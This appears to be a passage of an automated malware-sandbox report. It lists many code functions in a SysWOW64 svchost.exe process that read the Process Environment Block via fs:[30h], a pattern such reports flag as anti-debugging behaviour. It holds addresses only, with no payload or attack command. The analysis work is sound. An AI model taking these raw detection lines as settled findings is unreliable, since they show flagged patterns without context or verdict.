Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h] 2_2_02F30750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h] 2_2_02FBE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h] 2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h] 2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h] 2_2_02FB4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h] 2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h] 2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h] 2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h] 2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h] 2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h] 2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h] 2_2_02FAC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h] 2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h] 2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h] 2_2_02F30710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h] 2_2_02F60710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h] 2_2_02F6C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h] 2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h] 2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h] 2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h] 2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h] 2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h] 2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h] 2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h] 2_2_02F304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h] 2_2_02F644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h] 2_2_02FBA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h] 2_2_02F364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA49A mov eax, dword ptr fs:[00000030h] 2_2_02FEA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h] 2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h] 2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h] 2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h] 2_2_02FBC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA456 mov eax, dword ptr fs:[00000030h] 2_2_02FEA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h] 2_2_02F2645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h] 2_2_02F5245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h] 2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h] 2_2_02F6A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h] 2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h] 2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h] 2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h] 2_2_02F2C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] 2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] 2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] 2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] 2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] 2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] 2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] 2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h] 2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h] 2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h] 2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h] 2_2_02F325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h] 2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h] 2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h] 2_2_02F365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h] 2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h] 2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h] 2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h] 2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h] 2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h] 2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h] 2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h] 2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h] 2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h] 2_2_02F6E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h] 2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h] 2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h] 2_2_02F64588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h] 2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h] 2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h] 2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h] 2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h] 2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h] 2_2_02FC6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h] 2_2_03004B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h] 2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h] 2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h] 2_2_02F30AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h] 2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h] 2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] 2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] 2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] 2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h] 2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h] 2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h] 2_2_02F86AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h] 2_2_02F68A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h] 2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h] 2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] 2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] 2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] 2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h] 2_2_02FDEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h] 2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h] 2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h] 2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h] 2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h] 2_2_02F6CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h] 2_2_02F6CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h] 2_2_02F5EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h] 2_2_02FBCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h] 2_2_02F5EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h] 2_2_02FBCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h] 2_2_02FDEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] 2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] 2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] 2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] 2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] 2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] 2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h] 2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h] 2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] 2_2_02FE4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] 2_2_02FE4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h] 2_2_03004A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h] 2_2_02F2CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h] 2_2_02F28B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h] 2_2_02FDEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h] 2_2_02FE4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h] 2_2_02FE4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h] 2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h] 2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h] 2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h] 2_2_02FD8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h] 2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h] 2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h] 2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h] 2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h] 2_2_02FFA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h] 2_2_02F5E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004940 mov eax, dword ptr fs:[00000030h] 2_2_03004940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h] 2_2_02FBC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h] 2_2_02F30887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h] 2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h] 2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h] 2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h] 2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h] 2_2_02F60854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h] 2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h] 2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h] 2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h] 2_2_02F6A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h] 2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h] 2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h] 2_2_02FBC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h] 2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h] 2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h] 2_2_02FBE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
